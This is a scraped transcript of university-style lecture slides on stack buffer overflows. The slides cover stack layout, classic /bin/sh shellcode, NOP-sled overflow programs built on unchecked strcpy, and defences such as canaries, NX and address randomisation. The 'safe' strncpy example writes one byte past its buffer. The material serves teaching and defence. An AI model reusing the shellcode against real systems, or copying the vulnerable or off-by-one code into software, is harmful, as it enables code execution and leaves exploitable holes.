Presentation is loading. Please wait.

Presentation is loading. Please wait.

Overflows & Exploits. In the beginning 11/02/1988 Robert Morris, Jr., a graduate student in Computer Science at Cornell, wrote an experimental, self-replicating,

Published byMildred Kennedy Modified over 8 years ago

Similar presentations

Presentation on theme: "Overflows & Exploits. In the beginning 11/02/1988 Robert Morris, Jr., a graduate student in Computer Science at Cornell, wrote an experimental, self-replicating,"— Presentation transcript:

1 Overflows & Exploits

2 In the beginning 11/02/1988 Robert Morris, Jr., a graduate student in Computer Science at Cornell, wrote an experimental, self-replicating, self-propagating program called a worm and injected it into the Internet. One of the programs it attacked was fingerd which contained a buffer overflow. 02/13/1995 Thomas Lopatic posts to Bugtraq Hello there, we've installed the NCSA HTTPD 1.3 on our WWW server (HP9000/720, HP-UX 9.01) and I've found, that it can be tricked into executing shell commands. 08/11/1996 Smashing the Stack For Fun And Profit by Aleph1 (Phrack 49) syslog, splitvt, sendmail 8.7.5, Linux/FreeBSD mount, Xt library, at, etc.

3 Program Memory Your Program High Memory Addresses Low Addresses Args & Environment Variables Stack Unused Memory Heap Un-Initialized Data Segment (bss) Initialized Data Text Segment #include static int counter; static int another_variable = 0xAABBCCDD; void do_something(char *from) { char to[32]; strcpy(to, from); counter++; } int main( int argc, char **argv) { char *msg = "This is a constant string"; counter = 0; do_something(msg); printf("%d Somethings Done\n", counter); return 0; } RO data

4 The Stack A ‘stack’ is a type of data structure. The last object put on to the stack is the first that is removed. (LIFO) ‘Push’ – add something to the stack ‘Pop’ – remove something from the stack

5 Function Calls & The Stack When a function is called: 1.Function arguments are pushed on the stack. 2.Return address is pushed on the stack (in the ‘call’ instruction). 3.The previous function’s base pointer is pushed on the stack. 4.Local variables are pushed on the stack.

6 Functions Calls & The Stack Stack Heap 0xc0000000 0x08000000 #include int add(int x, int y) { return x + y; } int main(int argc, char **argv) { int num = 0; num = add(4,5); printf("num: %d\n", num); return 0; } Num = 0 5 4 Ret addr Saved base ptr (Add’s local vars) Stack Frame 1.Function arguments are pushed on the stack. 2.Return address is pushed on the stack (in the ‘call’ instruction). 3.The previous function’s base pointer is pushed on the stack. 4.Local variables are pushed on the stack.

7 %esp%ebp Function Calls & The Stack main: pushl %ebp movl %esp, %ebp subl $24, %esp andl $-16, %esp movl $0, %eax addl $15, %eax shrl $4, %eax sall $4, %eax subl %eax, %esp movl $0, -4(%ebp) movl $5, 4(%esp) movl $4, (%esp) call add movl %eax, -4(%ebp) movl -4(%ebp), %eax movl %eax, 4(%esp) movl $.LC0, (%esp) call printf movl $0, %eax leave ret Stack ebp1 0 %esp 5 4 %eip ebp2%ebp add: pushl %ebp movl %esp, %ebp movl 12(%ebp), %eax addl 8(%ebp), %eax popl %ebp ret X 9 %esp int add(int x, int y) { return x + y; } int main(int argc, char **argv) { int num = 0; num = add(4,5); printf("num: %d\n", num); return 0; }

8 Overflows #include static int counter; static int another_variable = 0xAABBCCDD; void do_something(char *from) { char to[32]; strcpy(to, from); counter++; } int main( int argc, char **argv) { char *msg = "This is a constant string"; counter = 0; do_something(msg); printf("%d Somethings Done\n", counter); return 0; } Ptr to msg Return Addr Base Ptr 32 bytes for ‘to’ This _is_ a_co nsta nt_s trin g\0 High Memory Addresses Low Addresses

9 Overflows #include static int counter; static int another_variable = 0xAABBCCDD; void do_something(char *from) { char to[32]; strcpy(to, from); counter++; } int main( int argc, char **argv) { char *msg = "This is a constant string that is too long for our buffer"; counter = 0; do_something(msg); printf("%d Somethings Done\n", counter); return 0; } g_fo Return Addr Base Ptr 32 bytes for ‘to’ This _is_ a_co nsta nt_s trin g_th at_is _too _lon Ptr to msg

10 Shellcode Shell code is raw machine code that performs some useful function for an attacker (usually to grant a ‘shell’) char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; See: http://www.vividmachines.com/shellcode/shellcode.html

11 Ptr to msg Overflows #include void do_something(char *from) { char to[45]; strcpy(to, from); } int main( int argc, char **argv) { char *msg = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b” "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd“ "\x80\xe8\xdc\xff\xff\xff/bin/shAAAABBBB"; do_something(msg); return 0; } Return Addr Base Ptr "\xeb\x1f\x5e\x89\x 76\x08\x31\xc0\x88 \x46\x07\x89\x46\x 0c\xb0\x0b” "\x89\xf3\x8d\x4e\x 08\x8d\x56\x0c\xcd \x80\x31\xdb\x89\x d8\x40\xcd“ "\x80\xe8\xdc\xff\xff \xff/bin/sh"; BBBB AAAA 0xc0a104b0

12 Overflows #include void do_something(char *from) { char to[256]; strcpy(to, from); } int main( int argc, char **argv) { char *msg = “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90” “\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b” "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd“ "\x80\xe8\xdc\xff\xff\xff/bin/shAAAABBBB"; do_something(msg); return 0; } "\xeb\x1f\x5e\x89\x 76\x08\x31\xc0\x88 \x46\x07\x89\x46\x 0c\xb0\x0b” "\x89\xf3\x8d\x4e\x 08\x8d\x56\x0c\xcd \x80\x31\xdb\x89\x d8\x40\xcd“ "\x80\xe8\xdc\xff\xff \xff/bin/sh"; AAAA 0xc0a104?? \x90 \x90

13 Defenses strncpy(char *dest, char *src, int n) –Use safe(r) functions. –Check the size of the input before you copy blindly void do_something(char *from) { char to[256]; strncpy(to, from, 255); to[256] = ‘\0’; }

14 Defenses No eXecute stack – (NX bit) –Code should be run from the text section, the stack should never be the target of the instruction pointer. –Make the stack non-executable, and the processor will fault on a stack overflow attack

15 Defenses Stack Canary –Generated by the compiler –A random value is pushed to the stack after the return address –Before returning from a function the canary value is checked to see if it matches the set value –An attacker cannot determine the canary value before the execution of the program Ptr to msg Return Addr Base Ptr This _is_ a_co nsta nt_s trin g\0 Canary = 0x31332241

16 Defenses Randomized Address Layouts –Segments of memory can be relocated slightly to produce different offsets each time a program is run –Hardcoded address (in shellcode for example) will not be valid from one run to the next

17 Recent Overflows Microsoft Windows Animated Cursor Remote Code Execution Vulnerability (3/28/2007) http://vil.nai.com/vil/Content/v_vul28505.htm A remote code execution vulnerability exists in the way that cursor, animated cursor, and icon formats are handled. An attacker could try to exploit the vulnerability by constructing a malicious cursor or icon file that could potentially allow remote code execution if a user visited a malicious Web site or viewed a malicious e-mail message. An attacker who successfully exploited this vulnerability could take complete control of an affected system. –Windows 2000 SP4 –Windows 2003 SP0 - SP2 –Windows XP SP2 –Vista SP0

18 Links Attack –http://www.phrack.org/archives/49/P49-14http://www.phrack.org/archives/49/P49-14 –http://en.wikipedia.org/wiki/Buffer_overflowhttp://en.wikipedia.org/wiki/Buffer_overflow –http://seclists.org/bugtraq/1995/Feb/0109.htmlhttp://seclists.org/bugtraq/1995/Feb/0109.html Defense –http://fedoraproject.org/wiki/Security/Featureshttp://fedoraproject.org/wiki/Security/Features –http://www.grsecurity.net/http://www.grsecurity.net/ –http://www.trl.ibm.com/projects/security/ssp/http://www.trl.ibm.com/projects/security/ssp/ Misc –BugTraq - http://www.securityfocus.com/archive/1http://www.securityfocus.com/archive/1 –VulnDev - http://www.securityfocus.com/archive/82http://www.securityfocus.com/archive/82 –Metasploit - http://www.metasploit.com/http://www.metasploit.com/

Download ppt "Overflows & Exploits. In the beginning 11/02/1988 Robert Morris, Jr., a graduate student in Computer Science at Cornell, wrote an experimental, self-replicating,"

Similar presentations

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)

Buffer Overflows Nick Feamster CS 6262 Spring 2009 (credit to Vitaly S. from UT for slides)
Smashing the Stack for Fun and Profit

Smashing the Stack for Fun and Profit
Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.

Exploring Security Vulnerabilities by Exploiting Buffer Overflow using the MIPS ISA Andrew T. Phillips Jack S. E. Tan Department of Computer Science University.
David Brumley Carnegie Mellon University Credit: Some slides from Ed Schwartz.

David Brumley Carnegie Mellon University Credit: Some slides from Ed Schwartz.
CMSC 414 Computer and Network Security Lecture 22 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 22 Jonathan Katz.
Review: Software Security David Brumley Carnegie Mellon University.

Review: Software Security David Brumley Carnegie Mellon University.
Foundations of Network and Computer Security J J ohn Black Lecture #30 Nov 26 th 2007 CSCI 6268/TLEN 5831, Fall 2007.

Foundations of Network and Computer Security J J ohn Black Lecture #30 Nov 26 th 2007 CSCI 6268/TLEN 5831, Fall 2007.
Intro to Exploitation Stack Overflows James McFadyen UTD Computer Security Group 10/20/2011.

Intro to Exploitation Stack Overflows James McFadyen UTD Computer Security Group 10/20/2011.
Gabe Kanzelmeyer CS 450 4/14/10.  What is buffer overflow?  How memory is processed and the stack  The threat  Stack overrun attack  Dangers  Prevention.

Gabe Kanzelmeyer CS 450 4/14/10.  What is buffer overflow?  How memory is processed and the stack  The threat  Stack overrun attack  Dangers  Prevention.
The Attack and Defense of Computers Dr. 許 富 皓 Attacking Program Bugs.

The Attack and Defense of Computers Dr. 許 富 皓 Attacking Program Bugs.
1 Function Calls Professor Jennifer Rexford COS 217 Reading: Chapter 4 of “Programming From the Ground Up” (available online from the course Web site)

1 Function Calls Professor Jennifer Rexford COS 217 Reading: Chapter 4 of “Programming From the Ground Up” (available online from the course Web site)
1 Homework Reading –PAL, pp 201-216, 297-312 Machine Projects –Finish mp2warmup Questions? –Start mp2 as soon as possible Labs –Continue labs with your.

1 Homework Reading –PAL, pp , Machine Projects –Finish mp2warmup Questions? –Start mp2 as soon as possible Labs –Continue labs with your.
September 22, 2014 Pengju (Jimmy) Jin Section E

September 22, 2014 Pengju (Jimmy) Jin Section E
Control hijacking attacks Attacker’s goal: – Take over target machine (e.g. web server) Execute arbitrary code on target by hijacking application control.

Control hijacking attacks Attacker’s goal: – Take over target machine (e.g. web server) Execute arbitrary code on target by hijacking application control.
University of Washington CSE 351 : The Hardware/Software Interface Section 5 Structs as parameters, buffer overflows, and lab 3.

University of Washington CSE 351 : The Hardware/Software Interface Section 5 Structs as parameters, buffer overflows, and lab 3.
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-

Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.

CAP6135: Malware and Software Vulnerability Analysis Buffer Overflow : Example of Using GDB to Check Stack Memory Cliff Zou Spring 2011.
Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.

Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.
Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)

Lecture 6: Buffer Overflow CS 436/636/736 Spring 2014 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit)
UNIVERSITY OF SOUTH CAROLINA Department of Computer Science and Engineering Stack allocation and buffer overflow CSCE 531 Presentation by Miao XU

UNIVERSITY OF SOUTH CAROLINA Department of Computer Science and Engineering Stack allocation and buffer overflow CSCE 531 Presentation by Miao XU

Similar presentations

Ads by Google